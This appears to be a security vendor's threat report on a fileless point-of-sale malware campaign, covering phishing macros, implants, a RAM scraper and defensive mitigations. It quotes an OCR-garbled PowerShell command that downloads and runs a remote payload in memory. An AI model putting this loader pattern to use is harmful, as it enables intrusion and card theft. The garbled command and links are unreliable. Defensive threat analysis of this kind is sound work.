Retail Point-of-Sale (PoS) systems remain a top target for the financially-motivated hacker. Theft of payment card data in large volume exists not only as its own segment within financial crime, but also serves to facilitate other even more harmful motives of today’s criminal elements. To the businesses targeted by cyber criminals, the negative effects are far reaching with impact on brand reputation, consumer and investor confidence, and business growth strategies. With such a lucrative target as payment card data, adversary groups continue to adapt Tactics, Techniques, and Procedures (TTPs) in response to defenders’ change in security practices. One effective attacker TTP is to use so-called “fileless,” or memory-resident malware, to carry out attacks against retailer PoS systems.
root9B discovered an advanced, targeted PoS intrusion focused on harvesting payment card information for exfiltration. The adversary’s campaign has active and operational Command and Control (C2) servers. root9B’s analysis determined that the adversary is using advanced memory-resident techniques to maintain persistence and avoid detection. The malware likely required a significant amount of time and knowledge to create. We typically see techniques at this level by well-resourced, well-funded, motivated adversaries.
This ongoing campaign has targeted numerous organizations and their PoS systems. root9B uncovered the TTPs utilized and describes them in a detailed analysis below. At a high-level, the adversary’s methodology consists of the following steps:
- Step 1: Reconnaissance and targeting of a corporate individual with a spearphishing email attack employing an ActiveMIME document with an MS Office-enabled macro.
- Step 2: Email recipient opens the ActiveMIME document attachment and clicks to enable content, executing a PowerShell command initiating a surreptitious shellcode download.
- Step 3: A shellcode blob encapsulating a Dynamic Link Library (DLL) malware is dropped in the system registry and loaded into memory, conducting basic enumeration and sandbox detection on the target. This malware appears to be an updated version of “PowerSniff.”
- Step 4: The malware continues reconnaissance of the target environment and contacts one of its five C2 domains with the results. If the environment meets the conditions the attacker is looking for, the attacker sends additional instructions.
- Step 5: The attackers install a second fileless implant in another registry shellcode blob. This implant, which we have named ShellTea, has not been previously observed or reported. We have identified six hardcoded C2 domains utilized by this implant.
- Step 6: The attacker explores the network using compromised privileged credentials and establishes persistent staging servers for deploying malware and collecting data from PoS endpoints. Several staging servers are utilized by the attackers to spread the workload and provide redundancy to thwart defensive measures.
- Step 7: An advanced PoS RAM scraping malware, we have named PoSlurp, is deployed to the PoS endpoints. PoSlurp directly injects memory-resident code into a privileged user mode process. This capability has not been previously reported. The attacker can specify which PoS processes should be monitored for payment card transactions.
root9B has been able to deconstruct the four major components of the adversary’s activities. Provided here is a detailed analysis of the initial access method, command-and-control methods, and the new ShellTea implant and PoSlurp POS RAM Scraper.
Initial execution of the attack begins with a customized email to a targeted entity with a malicious macro-enabled ActiveMime Office document attached. Once the targeted victim opens the attached document and clicks to enable macros, the macro quietly launches a PowerShell command that will download another PowerShell stage from a staging site (often public paste sites) into memory and execute it. Seen in the command line below is the command (iex) to execute the downloaded payload in memory, after determining if a 32-bit or 64 bit payload is required ([IntPtr)::size -eq 4). This technique maintains a fileless footprint on
powershcll -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile – noexit -c if ([IntFtr)::size -eq 4) ((new-object Net.WebClient).DownloadString(1https://(STAGING SITES”) I iex ) else ((new-object Net.WebClient).DownloadString(‘https://(STAG1NG SITE)”))
- Apply macro restrictions in your environment to prevent users from inadvertently running malicious Office macros to help address this common initial access vector. For details, see: tittps://blogs.technet. com/mmpc/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-preventinfection!,
- Limit the exposure of privileged administrator credentials by following best practices such as the PAW model, audit your credential risks, and require multifactor authentication for privileged users. For details, see: https://docs.microsoft.cornien-us/windows-server/identity/securing–privileged-access/ privileged-access-workstations.
- Implement application whitelisting on PoS systems utilizing Microsoft’s built-in AppLocker or one of many commercial solutions. Much like the previous mitigation recommendation, PoS systems should be highly standardized and have no software running or installed that isn’t part of required functionality. Audit application execution in a development environment to build an effective yet minimal whitelist.
- Develop and maintain a robust security monitoring program or contract an experienced security Tune your environment to collect relevant network and endpoint-based artifacts that allow you to detect adversary actions. Focus your analysis on critical network segments and employ active defense methodologies (HUNT) to proactively identify persistent threats.
- Create a whitelist or greylist of domains and IP addresses that your organization is allowed to reach via the network.
- Implement effective network segmentation controls. Prohibiting communication between distinct segments such as PoS and Store networks, except for required ports and protocols, and using different credentials in each network will greatly delay if not eliminate the attacker’s ability to traverse the Communication between systems in these critical networks should be far more predictable than the corporate network, enabling a security monitoring program to more easily identify abnormal activity.
INDICATORS OF COMPROMISE (IOCS)
POWERSNIFF C2 DOMAINS
SHELLTEA C2 DOMAINS
Function Hash Resolution Tool, IDA Script, and Process Name CRC32 Code: https://gist.github.com/ root9b/24b9b25f3b0b06a6939881e68d0bd2d0